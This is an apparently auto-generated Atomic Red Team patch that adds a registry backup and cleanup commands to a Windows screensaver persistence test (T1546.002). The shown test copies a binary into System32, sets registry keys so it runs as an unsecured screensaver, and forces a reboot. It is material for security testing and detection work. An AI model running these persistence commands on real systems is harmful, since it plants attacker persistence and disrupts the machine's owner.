From 9c46e34eb0a237c0879ba3dc2ef72ecee4339d6e Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Wed, 13 Jul 2022 16:55:34 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/index.yaml     | 10 ++++++++++
 atomics/T1546.002/T1546.002.md |  7 +++++++
 2 files changed, 17 insertions(+)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 69c112de..7d1079ce 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37469,12 +37469,17 @@ privilege-escalation:
           default: C:\Windows\System32\cmd.exe
       executor:
         command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
           copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
           shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
         name: command_prompt
         elevation_required: true
   T1543.001:
@@ -59611,12 +59616,17 @@ persistence:
           default: C:\Windows\System32\cmd.exe
       executor:
         command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
           copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
           reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
           shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
         name: command_prompt
         elevation_required: true
   T1543.001:
diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md
index 256d30c1..7105d9b4 100644
--- a/atomics/T1546.002/T1546.002.md
+++ b/atomics/T1546.002/T1546.002.md
@@ -40,6 +40,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 
 
 ```cmd
+reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
@@ -48,6 +49,12 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ
 shutdown /r /t 0
 ```
 
+#### Cleanup Commands:
+```cmd
+reg import %userprofile%\backup.reg
+del %userprofile%\backup.reg
+del %SystemRoot%\System32\evilscreensaver.scr
+```